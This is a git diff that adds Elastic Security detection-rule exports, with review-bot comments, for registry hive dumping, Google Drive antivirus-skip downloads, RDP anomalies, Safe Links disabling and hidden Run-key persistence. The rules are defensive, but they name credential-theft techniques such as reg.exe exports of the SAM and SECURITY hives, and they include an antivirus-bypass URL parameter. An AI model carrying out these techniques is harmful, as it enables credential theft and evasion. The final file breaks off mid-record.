@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Credential Acquisition via Registry Hive Dumping", + "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached credentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the compromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether the user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"reg.exe\" or process.name : \"reg.exe\") and\n process.args : (\"save\", \"export\") and\n process.args : (\"hklm\\\\sam\", \"hklm\\\\security\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": 
"^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.004", + "name": "LSA Secrets", + "reference": "https://attack.mitre.org/techniques/T1003/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109", + "type": "security-rule" +} \ No 
newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110.json new file mode 100644 index 00000000000..d8ce59cc56f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110.json 
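Review bot: The false positive section of the note misspells `legitamitely`; it should read `legitimately`, in the _110 file that follows as well, since it repeats the same note text. The query matches only `hklm\\sam` and `hklm\\security`, while the guide itself states that the SYSTEM hive is needed to decrypt either; whether a standalone export of that hive should alert too is a tuning decision, and if it is left out on purpose a short sentence in the note saying so would save the next reviewer the question.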
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Credential Acquisition via Registry Hive Dumping", + "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached credentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the compromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether the user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"reg.exe\" or process.name : \"reg.exe\") and\n process.args : (\"save\", \"export\") and\n process.args : (\"hklm\\\\sam\", \"hklm\\\\security\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": 
"^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.004", + "name": "LSA Secrets", + "reference": "https://attack.mitre.org/techniques/T1003/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110", + "type": "security-rule" +} \ No 
newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3.json new file mode 100644 index 00000000000..d6045c01f27 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3.json 
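Review bot: The investigation guide carried in the `note` string still contains the misspelling `legitamitely` in the false-positive analysis bullet ("Check whether the user is legitamitely performing this kind of activity"); it should read `legitimately`. If these `_NNN.json` files are generated from an upstream rule source, the correction belongs there followed by a regenerated export rather than a hand edit of this file, since the same text presumably appears in the `_109` export preceding this hunk. Everything else in the export (query, required_fields, threat mapping) is consistent with the fields the EQL query references.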
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious file download activity from a Google Drive URL. This could indicate an attempt to deliver phishing payloads via a trusted webservice.", + "false_positives": [ + "Approved third-party applications that use Google Drive download URLs.", + "Legitimate publicly shared files from Google Drive." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Downloaded from Google Drive", + "query": "process where\n\n /* common browser processes */\n event.action in (\"exec\", \"fork\", \"start\") and \n\n process.name : (\"Microsoft Edge\", \"chrome.exe\", \"Google Chrome\", \"google-chrome-stable\", \n \"google-chrome-beta\", \"google-chrome\", \"msedge.exe\", \"firefox.exe\", \"brave.exe\", \n \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\", \"firefox\", \n \"powershell.exe\", \"curl\", \"curl.exe\", \"wget\", \"wget.exe\") and \n\n /* Look for Google Drive download URL with AV flag skipping */\n (process.command_line : \"*drive.google.com*\" and process.command_line : \"*export=download*\" and process.command_line : \"*confirm=no_antivirus*\")\n", + "references": [ + "https://intelligence.abnormalsecurity.com/blog/google-drive-matanbuchus-malware" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a8afdce2-0ec1-11ee-b843-f661ea17fbcd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", 
+ "Use Case: Threat Detection", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3.json b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3.json new file mode 100644 index 00000000000..70cf8718c4a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3.json 
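Review bot: The `index` list for this `process where` query uses the broad pattern `"logs-endpoint*"`, whereas the other exports in this diff scope endpoint data to the event stream they actually query (`"logs-endpoint.events.process-*"` in the hive-dumping rule, and the `a9b05c3b` `_108` export narrows its own pattern to `"logs-endpoint.events.registry-*"`); a pattern without the `.events.` segment presumably also matches non-event endpoint streams and makes the rule scan data it can never match. I would expect `"logs-endpoint.events.process-*"` here unless the wider pattern is deliberate. Separately, the `description` ("Identifies suspicious file download activity from a Google Drive URL") reads wider than the query, which only fires when `process.command_line` contains all three of `drive.google.com`, `export=download` and `confirm=no_antivirus`; stating that the rule keys on the antivirus-scan bypass parameter would tell analysts what coverage to expect and where to look when tuning the `false_positives` exceptions.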
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high variance of RDP session duration. Long RDP sessions can be used to evade detection mechanisms via session persistence, and might be used to perform tasks such as lateral movement, that might require uninterrupted access to a compromised machine.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_var_rdp_session_duration", + "name": "High Variance in RDP Session Duration", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "a8d35ca0-ad8d-48a9-9f6c-553622dca61a", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103.json new file mode 100644 index 00000000000..bc9010293dc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103.json 
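Review bot: The `tags` array carries both `"Rule Type: ML"` and `"Rule Type: Machine Learning"`, which label the same thing twice; other exports in this diff use a single tag per facet, so one of the two looks like a leftover from a tag rename and could be dropped upstream. The rest of the export is coherent: `type` is `machine_learning`, `machine_learning_job_id` and `anomaly_threshold` are set, and `related_integrations` lists the `lmd` package that the `setup` text says must be installed.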
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", + "false_positives": [ + "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Link Policy Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105.json new file mode 100644 index 00000000000..c330677b483 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105.json 
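Review bot: The export ships `"note": ""`, so this rule has no triage or investigation guidance even though it is a medium-severity Initial Access detection; the `_105` and `_206` exports that follow in this diff are byte-identical apart from the `version` field and carry the same empty `note`, so the point applies to all three. If the upstream rule has no investigation guide yet, omitting the key is cleaner than an empty string; if one exists, these exports should be regenerated to include it. Minor: the `false_positives` text and `query` are consistent with the `required_fields` listed, so nothing else in the hunk needs attention.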
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", + "false_positives": [ + "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Link Policy Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206.json new file mode 100644 index 00000000000..95f176c9851 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", + "false_positives": [ + "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Link Policy Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_107.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_107.json new file mode 100644 index 00000000000..a736075a2b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_107.json 
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Hidden Run Key Detected", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "references": [ + 
"https://github.com/outflanknl/SharpHide", + "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon 